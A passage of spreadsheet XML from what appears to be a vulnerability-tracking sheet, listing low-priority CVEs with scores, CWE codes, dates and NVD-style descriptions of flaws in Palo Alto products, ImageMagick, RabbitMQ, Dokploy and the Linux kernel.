      <c r="C2274" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D2274" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2274" s="5" t="inlineStr"/>
      <c r="F2274" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2274" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H2274" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I2274" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2274" s="5" t="inlineStr"/>
      <c r="K2274" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2274" s="5" t="inlineStr">
        <is>
          <t>An improper link resolution before file access vulnerability exists in the Palo Alto Networks Prisma® Access Agent on Linux platforms that enables a local low privileged user to delete system files in a limited scope and disable Prisma Access Agent.
The Prisma Access Agent on macOS, Windows, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M2274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0291</t>
        </is>
      </c>
    </row>
    <row r="2275">
      <c r="A2275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0302</t>
        </is>
      </c>
      <c r="C2275" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D2275" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2275" s="5" t="inlineStr"/>
      <c r="F2275" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2275" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2275" s="5" t="inlineStr"/>
      <c r="I2275" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2275" s="5" t="inlineStr"/>
      <c r="K2275" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2275" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in Palo Alto Networks Checkov by Prisma® Cloud enables a local user to execute arbitrary commands in the processes running Checkov.</t>
        </is>
      </c>
      <c r="M2275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0302</t>
        </is>
      </c>
    </row>
    <row r="2276">
      <c r="A2276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0308</t>
        </is>
      </c>
      <c r="C2276" s="5" t="n">
        <v>1.1</v>
      </c>
      <c r="D2276" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2276" s="5" t="inlineStr"/>
      <c r="F2276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2276" s="5" t="inlineStr">
        <is>
          <t>java, palo alto</t>
        </is>
      </c>
      <c r="H2276" s="5" t="inlineStr"/>
      <c r="I2276" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2276" s="5" t="inlineStr"/>
      <c r="K2276" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2276" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS® software enables a malicious authenticated administrator to store or execute a JavaScript payload using the web interface. 
This issue is applicable to PAN-OS software on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). 
Cloud NGFW and Prisma® Access are not affected by this vulnerability.</t>
        </is>
      </c>
      <c r="M2276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0308</t>
        </is>
      </c>
    </row>
    <row r="2277">
      <c r="A2277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86422</t>
        </is>
      </c>
      <c r="C2277" s="5" t="n">
        <v>1</v>
      </c>
      <c r="D2277" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2277" s="5" t="inlineStr"/>
      <c r="F2277" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2277" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2277" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="I2277" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2277" s="5" t="inlineStr"/>
      <c r="K2277" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2277" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 contains a time-of-check-time-of-use vulnerability in path policy enforcement on Windows that allows attackers to bypass read or write restrictions by exploiting symlink race conditions. Attackers can swap symlinks between policy validation and file access to read or write policy-denied files.</t>
        </is>
      </c>
      <c r="M2277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86422</t>
        </is>
      </c>
    </row>
    <row r="2278">
      <c r="A2278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0289</t>
        </is>
      </c>
      <c r="C2278" s="5" t="n">
        <v>0.5</v>
      </c>
      <c r="D2278" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2278" s="5" t="inlineStr"/>
      <c r="F2278" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2278" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2278" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:prisma_browser</t>
        </is>
      </c>
      <c r="I2278" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2278" s="5" t="inlineStr"/>
      <c r="K2278" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L2278" s="5" t="inlineStr">
        <is>
          <t>A  security bypass vulnerability in the Account Protection feature of Palo Alto Networks Prisma® Browser enables a user to bypass intended security controls.</t>
        </is>
      </c>
      <c r="M2278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0289</t>
        </is>
      </c>
    </row>
    <row r="2279">
      <c r="A2279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0290</t>
        </is>
      </c>
      <c r="C2279" s="5" t="n">
        <v>0.5</v>
      </c>
      <c r="D2279" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2279" s="5" t="inlineStr"/>
      <c r="F2279" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2279" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2279" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:prisma_browser</t>
        </is>
      </c>
      <c r="I2279" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2279" s="5" t="inlineStr"/>
      <c r="K2279" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L2279" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the Account Protection feature of  Palo Alto Networks Prisma® Browser enables a local attacker to view sensitive data.</t>
        </is>
      </c>
      <c r="M2279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0290</t>
        </is>
      </c>
    </row>
    <row r="2280">
      <c r="A2280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2280" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-26962</t>
        </is>
      </c>
      <c r="C2280" s="5" t="inlineStr"/>
      <c r="D2280" s="5" t="inlineStr"/>
      <c r="E2280" s="5" t="inlineStr"/>
      <c r="F2280" s="5" t="inlineStr"/>
      <c r="G2280" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2280" s="5" t="inlineStr"/>
      <c r="I2280" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2280" s="5" t="inlineStr"/>
      <c r="K2280" s="5" t="inlineStr"/>
      <c r="L2280" s="5" t="inlineStr">
        <is>
          <t>Italtel NFV 11.1.2-20210318 allows Multiple Stored XSS under NP_BCCAS-RMCTRL-01/IMCSCIWebGui/configuration.jsp?opration=list&amp;object=announcementAS via the name, username, or mrfAnnouncementNameparameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.</t>
        </is>
      </c>
      <c r="M2280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-26962</t>
        </is>
      </c>
    </row>
    <row r="2281">
      <c r="A2281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-36392</t>
        </is>
      </c>
      <c r="C2281" s="5" t="inlineStr"/>
      <c r="D2281" s="5" t="inlineStr"/>
      <c r="E2281" s="5" t="inlineStr"/>
      <c r="F2281" s="5" t="inlineStr"/>
      <c r="G2281" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2281" s="5" t="inlineStr"/>
      <c r="I2281" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2281" s="5" t="inlineStr"/>
      <c r="K2281" s="5" t="inlineStr"/>
      <c r="L2281" s="5" t="inlineStr">
        <is>
          <t>FairSketch Rise CRM Version 3.9.6 is vulnerable to Cross Site Scripting (XSS). An authenticated administrator can inject arbitrary JavaScript into an item's title, which is stored server-side and executed in the browser of any client user who visits the store page, enabling session hijacking, account takeover, and phishing.</t>
        </is>
      </c>
      <c r="M2281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-36392</t>
        </is>
      </c>
    </row>
    <row r="2282">
      <c r="A2282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4765</t>
        </is>
      </c>
      <c r="C2282" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D2282" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E2282" s="5" t="inlineStr"/>
      <c r="F2282" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2282" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2282" s="5" t="inlineStr"/>
      <c r="I2282" s="5" t="inlineStr">
        <is>
          <t>2026-07-13</t>
        </is>
      </c>
      <c r="J2282" s="5" t="inlineStr"/>
      <c r="K2282" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2282" s="5" t="inlineStr">
        <is>
          <t>Self Cross-Site Scripting (Self-XSS) vulnerability in the RD Station Conversas chat feature. The vulnerability lies in the ‘name’ parameter of the initialisation process due to incorrect sanitisation of user-supplied input. Exploitation allows specially crafted JavaScript code to be injected, which is executed within the context of the user’s own session who provides the payload. The demonstrated impact is limited to the user who enters and executes the payload.</t>
        </is>
      </c>
      <c r="M2282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4765</t>
        </is>
      </c>
    </row>
    <row r="2283">
      <c r="A2283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61634</t>
        </is>
      </c>
      <c r="C2283" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D2283" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E2283" s="5" t="inlineStr"/>
      <c r="F2283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2283" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2283" s="5" t="inlineStr"/>
      <c r="I2283" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2283" s="5" t="inlineStr"/>
      <c r="K2283" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2283" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.33.0, the AMQP connection tuning path records the negotiated AMQP frame_max value, but src/main/java/com/rabbitmq/client/impl/SocketFrameHandler.java and NettyFrameHandlerFactory continue to validate broker-controlled frame payload lengths against maxInboundMessageBodySize because the negotiated limit is not applied consistently through setMaxInboundFramePayloadSize. A malicious or compromised broker can send a method frame larger than the negotiated frame_max during or after connection establishment, causing the client to allocate and decode a protocol-invalid frame instead of rejecting it with MalformedFrameException. The protocol violation can disrupt the affected connection and cause client-side denial of service. This issue is fixed in version 5.33.0.</t>
        </is>
      </c>
      <c r="M2283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61634</t>
        </is>
      </c>
    </row>
    <row r="2284">
      <c r="A2284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71802</t>
        </is>
      </c>
      <c r="C2284" s="5" t="inlineStr"/>
      <c r="D2284" s="5" t="inlineStr"/>
      <c r="E2284" s="5" t="inlineStr"/>
      <c r="F2284" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2284" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2284" s="5" t="inlineStr"/>
      <c r="I2284" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2284" s="5" t="inlineStr"/>
      <c r="K2284" s="5" t="inlineStr"/>
      <c r="L2284" s="5" t="inlineStr">
        <is>
          <t>A stored Cross-Site Scripting (XSS) vulnerability exists in the announcement preview component of REBUILD 4.4.3. Although the announcement content undergoes HTML escaping on the server side, the client-side preview code reverses the escaped entities using jQuery's `html().text()` method and subsequently injects the result into the DOM. An administrator or attacker capable of controlling the announcement content can exploit this vulnerability to execute arbitrary JavaScript code in the browsers of users viewing the affected pages "which may include the dashboard, activity feed, or login page, depending on the announcement's visibility settings.</t>
        </is>
      </c>
      <c r="M2284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71802</t>
        </is>
      </c>
    </row>
    <row r="2285">
      <c r="A2285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72885</t>
        </is>
      </c>
      <c r="C2285" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D2285" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E2285" s="5" t="inlineStr"/>
      <c r="F2285" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2285" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2285" s="5" t="inlineStr"/>
      <c r="I2285" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2285" s="5" t="inlineStr"/>
      <c r="K2285" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2285" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, dockerContextPath accepted by apps/dokploy/components/dashboard/application/build/show.tsx flows through getDockerContextPath in packages/server/src/utils/filesystem/directory.ts into the unquoted cd command in packages/server/src/utils/builders/docker-file.ts before execution by execAsync, allowing an authenticated application editor to execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M2285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72885</t>
        </is>
      </c>
    </row>
    <row r="2286">
      <c r="A2286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80841</t>
        </is>
      </c>
      <c r="C2286" s="5" t="inlineStr"/>
      <c r="D2286" s="5" t="inlineStr"/>
      <c r="E2286" s="5" t="inlineStr"/>
      <c r="F2286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2286" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2286" s="5" t="inlineStr"/>
      <c r="I2286" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2286" s="5" t="inlineStr"/>
      <c r="K2286" s="5" t="inlineStr"/>
      <c r="L2286" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/packet: defer vmalloc TX_RING free until skbs finish
AF_PACKET TX_RING skbs keep a raw pointer to their ring frame. The skb
page references preserve page-backed ring blocks after pg_vec is freed,
but they do not preserve a vmalloc mapping.
tpacket_destruct_skb() currently drops the pending reference before
writing the timestamp and TP_STATUS_AVAILABLE to the frame. Move the
decrement after those stores. The smp_wmb() in __packet_set_status()
orders the frame stores before the decrement.
Also recheck pending TX frames under pg_vec_lock before non-closing
ring replacement, so a racing send cannot add a pending skb between
the initial check and the ring swap.
Ring allocation can produce a mixture of page-backed and vmalloc-backed
blocks. Allocate deferred-work storage during TX ring setup when the
first vmalloc-backed block is encountered, and keep its pointer in the
pg_vec allocation header. If allocation fails, return -ENOMEM from ring
setup. On socket close, a non-NULL pointer identifies a vmalloc-backed
vector without a scan. If TX skbs remain, defer the whole vector to
system_long_wq.
After pg_vec is detached, a late destructor can skip the pending
decrement. Use socket write-memory accounting as the deferred lifetime
gate instead: an skb remains charged through its final sock_wfree(),
after all ring-frame accesses. The delayed work retains a socket
reference and reschedules itself until no TX skbs remain.
Move pending_refcnt release to packet_sock_destruct() so late skb
destructors and deferred cleanup can safely use it after
packet_release(). Page-backed teardown remains synchronous, and no lock
is added to the TX completion hot path.</t>
        </is>
      </c>
      <c r="M2286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80841</t>
        </is>
      </c>
    </row>
    <row r="2287">
      <c r="A2287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80847</t>
        </is>
      </c>
      <c r="C2287" s="5" t="inlineStr"/>
      <c r="D2287" s="5" t="inlineStr"/>
      <c r="E2287" s="5" t="inlineStr"/>
      <c r="F2287" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2287" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2287" s="5" t="inlineStr"/>
      <c r="I2287" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2287" s="5" t="inlineStr"/>
      <c r="K2287" s="5" t="inlineStr"/>
      <c r="L2287" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tcp: clamp route advmss to TCP_MIN_MSS
tcp_select_initial_window() assumes that callers never pass an MSS
smaller than 1, but route-derived advmss values can violate that
assumption.
A too-small explicit RTAX_ADVMSS is one way to get there, but it is not
the only one. The same divide-by-zero can also be reached through the
"default advmss" path when RTAX_ADVMSS is left at 0 and the effective
advmss is later driven down by route MTU and min_adv_mss.
Introduce a tcp_dst_advmss() helper that clamps route advmss to
TCP_MIN_MSS before TCP consumes it, and use it in the TCP paths that
derive advmss from dst metrics. This keeps the effective MSS from
dropping to zero before tcp_select_initial_window() rounds the receive
window.</t>
        </is>
      </c>
      <c r="M2287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80847</t>
        </is>
      </c>
    </row>
    <row r="2288">
      <c r="A2288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80858</t>
        </is>
      </c>
      <c r="C2288" s="5" t="inlineStr"/>
      <c r="D2288" s="5" t="inlineStr"/>
      <c r="E2288" s="5" t="inlineStr"/>
      <c r="F2288" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2288" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2288" s="5" t="inlineStr"/>
      <c r="I2288" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2288" s="5" t="inlineStr"/>
      <c r="K2288" s="5" t="inlineStr"/>
      <c r="L2288" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: publish io-uring queues with release semantics
fuse_uring_create_queue() initializes a fuse_ring_queue and then
publishes the pointer into ring-&gt;queues[qid] with WRITE_ONCE() under the
fch-&gt;lock. There are several readers that may concurrently be fetching
that pointer locklessly and then deferencing it.
WRITE_ONCE() doesn't ensure ordering of the queue's field
initialization before the ring-&gt;queues[qid] pointer assignment. The
queue must be published with smp_store_release() so the field
initialization is guaranteed to happen before.
Readers in paths where the read may happen concurrently with the store
need to use READ_ONCE() because any race involving a plain access is
undefined.</t>
        </is>
      </c>
      <c r="M2288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80858</t>
        </is>
      </c>
    </row>
    <row r="2289">
      <c r="A2289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80859</t>
        </is>
      </c>
      <c r="C2289" s="5" t="inlineStr"/>
      <c r="D2289" s="5" t="inlineStr"/>
      <c r="E2289" s="5" t="inlineStr"/>
      <c r="F2289" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2289" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2289" s="5" t="inlineStr"/>
      <c r="I2289" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2289" s="5" t="inlineStr"/>
      <c r="K2289" s="5" t="inlineStr"/>
      <c r="L2289" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: fix missing barrier when checking io-uring readiness
fuse_block_alloc() reads fch-&gt;initialized and then fch-&gt;io_uring.
fch-&gt;io_uring is set before fch-&gt;initialized, ordered by the smp_wmb()
in fuse_chan_set_intialized(), but fuse_block_alloc() has no matching
read barrier between the two loads.
This may lead a CPU to observe fch-&gt;initialized=1 but fch-&gt;io_uring=0,
and skip the check that blocks request allocation until the io-uring
queues are ready. This can reintroduce the lock-order inversion deadlock
that commit 3393ff964e0f prevents.
Add an smp_rmb() barrier to pair with the smp_wmb() in
fuse_chan_set_initialized() to prevent this.</t>
        </is>
      </c>
      <c r="M2289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80859</t>
        </is>
      </c>
    </row>
    <row r="2290">
      <c r="A2290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80860</t>
        </is>
      </c>
      <c r="C2290" s="5" t="inlineStr"/>
      <c r="D2290" s="5" t="inlineStr"/>
      <c r="E2290" s="5" t="inlineStr"/>
      <c r="F2290" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2290" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2290" s="5" t="inlineStr"/>
      <c r="I2290" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2290" s="5" t="inlineStr"/>
      <c r="K2290" s="5" t="inlineStr"/>
      <c r="L2290" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: fix race between interrupt and resend
After commit f8fce75fedf7 ("fuse: clear intr_entry in fuse_resend and
fuse_remove_pending_req") the WARN_ON(!list_empty(&amp;req-&gt;intr_entry)) in
fuse_request_free() still triggers due to the following race:
In request_wait_answer()
  if (test_bit(FR_SENT, &amp;req-&gt;flags)) -&gt; returns true
In fuse_chan_resend()
  clear_bit(FR_SENT, &amp;req-&gt;flags)
In request_wait_answer()
  queue_interrupt(req)
Fix by:
 - move clearing FR_SENT inside fpq-&gt;lock
 - move setting FR_PENDING inside fiq-&gt;lock
 - recheck FR_SENT after acquiring fiq-&gt;lock in fuse_dev_queue_interrupt()</t>
        </is>
      </c>
      <c r="M2290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80860</t>
        </is>
      </c>
    </row>
    <row r="2291">
      <c r="A2291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80861</t>
        </is>
      </c>
      <c r="C2291" s="5" t="inlineStr"/>
      <c r="D2291" s="5" t="inlineStr"/>
      <c r="E2291" s="5" t="inlineStr"/>
      <c r="F2291" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2291" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2291" s="5" t="inlineStr"/>
      <c r="I2291" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2291" s="5" t="inlineStr"/>
      <c r="K2291" s="5" t="inlineStr"/>
      <c r="L2291" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: xhci: bail out of setup if the controller is inaccessible
xhci_gen_setup() locates the operational registers using the capability
length read from the very first register:
	xhci-&gt;op_regs = hcd-&gt;regs +
		HC_LENGTH(readl(&amp;xhci-&gt;cap_regs-&gt;hc_capbase));
If the controller is dead or has dropped off the bus, that read returns
~0, HC_LENGTH() truncates it to 0xff, and op_regs ends up 0xff bytes
past the page-aligned MMIO base, i.e. unaligned. The first access
through it, xhci_halt() -&gt; xhci_handshake() reading op_regs-&gt;status, is
then an unaligned readl() on device memory. arm64 faults on unaligned
device accesses, so instead of xhci_handshake() catching the all-ones
value and returning -ENODEV, setup oopses:
  xhci-pci-renesas 0005:08:00.0: Unable to change power state from D3cold to D0, device inaccessible
  xhci-pci-renesas 0005:08:00.0: xHCI Host Controller
  xhci-pci-renesas 0005:08:00.0: new USB bus registered, assigned bus number 1
  Unable to handle kernel paging request at virtual address ffff80030a770103
    ESR = 0x0000000096000021
    FSC = 0x21: alignment fault
  Internal error: Oops: 0000000096000021 [#1]  SMP
  pc : xhci_halt [xhci_hcd]
  Call trace:
   xhci_halt
   xhci_gen_setup
   xhci_pci_setup
   usb_add_hcd
   usb_hcd_pci_probe
   xhci_pci_common_probe
   xhci_pci_renesas_probe
This was hit with a Renesas uPD720201 that failed to power up ("Unable
to change power state from D3cold to D0, device inaccessible") yet still
reached the HCD probe path.
Read the capability register once, and if it reads back the all-ones
value (as xhci_handshake() and xhci_reset() already test for), abort
setup with -ENODEV before op_regs is derived from it. Reading it once
also avoids re-reading a register that may change under a concurrent
hot-removal.</t>
        </is>
      </c>
      <c r="M2291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80861</t>
        </is>
      </c>
    </row>
    <row r="2292">
      <c r="A2292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80878</t>
        </is>
      </c>
      <c r="C2292" s="5" t="inlineStr"/>
      <c r="D2292" s="5" t="inlineStr"/>
      <c r="E2292" s="5" t="inlineStr"/>
      <c r="F2292" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2292" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2292" s="5" t="inlineStr"/>
      <c r="I2292" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2292" s="5" t="inlineStr"/>
      <c r="K2292" s="5" t="inlineStr"/>
      <c r="L2292" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix leak of ungot volume
Fix afs_lookup_volume_rcu() so that it doesn't leak a dying volume if
afs_try_get_volume() fails.</t>
        </is>
      </c>
      <c r="M2292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80878</t>
        </is>
      </c>
    </row>
    <row r="2293">
      <c r="A2293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80915</t>
        </is>
      </c>
